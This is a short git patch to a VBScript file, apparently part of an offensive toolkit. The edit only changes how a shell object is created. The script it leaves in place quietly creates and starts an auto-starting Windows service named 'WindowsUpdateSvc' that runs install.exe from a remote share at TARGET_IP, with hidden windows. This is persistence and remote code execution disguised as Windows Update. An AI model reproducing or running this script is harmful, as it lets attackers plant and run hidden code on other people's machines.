From f981fabe0b33099891442b081f952e55db30e24f Mon Sep 17 00:00:00 2001 From: pimps Date: Tue, 4 Jul 2017 13:52:55 +1000 Subject: [PATCH] Update script.vbs --- resources/script.vbs | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/resources/script.vbs b/resources/script.vbs index ee029ae..a968bde 100644 --- a/resources/script.vbs +++ b/resources/script.vbs @@ -1,3 +1,3 @@ -Set oShell = WScript.CreateObject ("WScript.Shell") +Set oShell = CreateObject("WScript.Shell") oShell.run "cmd.exe /c sc create WindowsUpdateSvc binpath= \\TARGET_IP\update\install.exe start= auto",0,True oShell.run "cmd.exe /c sc start WindowsUpdateSvc",0,True